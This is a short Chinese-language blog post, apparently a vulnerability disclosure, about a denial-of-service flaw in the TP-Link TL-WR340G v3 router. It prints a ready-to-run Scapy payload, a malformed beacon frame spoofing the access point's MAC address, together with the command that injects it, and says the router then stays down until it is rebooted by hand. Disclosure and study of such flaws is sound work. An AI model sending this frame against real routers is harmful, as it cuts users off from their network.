TL-WR340G是TP-Link出品的一款羽量級無線路由器,近日有國外駭客發現了這款路由器上的一個拒絕服務漏洞,只要發送一個簡單的畸形包到路由器,便可使路由器停止工作,需要手動重啟路由器才能恢復正常,算是比較嚴重的了

漏洞細節:

型號:TL-WR340G無線路由器
固件版本: 4.7.11  Build 101102 Rel.60376n
硬體版本:WR340G v3

觸發漏洞的過程非常簡單,需要用到網路軟體Scapy,構造包的詳情如下:

fr = RadioTap()/Dot11(addr1="ff:ff:ff:ff:ff:ff",addr2="<AP 
MAC>",addr3="<AP MAC>")/Dot11Beacon()/Dot11Elt()

接下來發送資料包:

sendp(fr,iface="injection capable wireless interface",count=5)

攻擊成功之後,路由器將直接掛掉,具體表現就是不管已經連接還是未連接的用戶端都無法連接互聯網,除非手動登入管理介面軟重啟或者斷電重啟。

By tony

自由軟體愛好者~喜歡不斷的思考各種問題,有新的事物都會想去學習嘗試 做實驗並熱衷研究 沒有所謂頂天的技術 只有謙虛及不斷的學習 精進專業,本站主要以分享系統及網路相關知識、資源而建立。 Github http://stnet253.github.io

發佈留言

發佈留言必須填寫的電子郵件地址不會公開。 必填欄位標示為 *

這個網站採用 Akismet 服務減少垃圾留言。進一步了解 Akismet 如何處理網站訪客的留言資料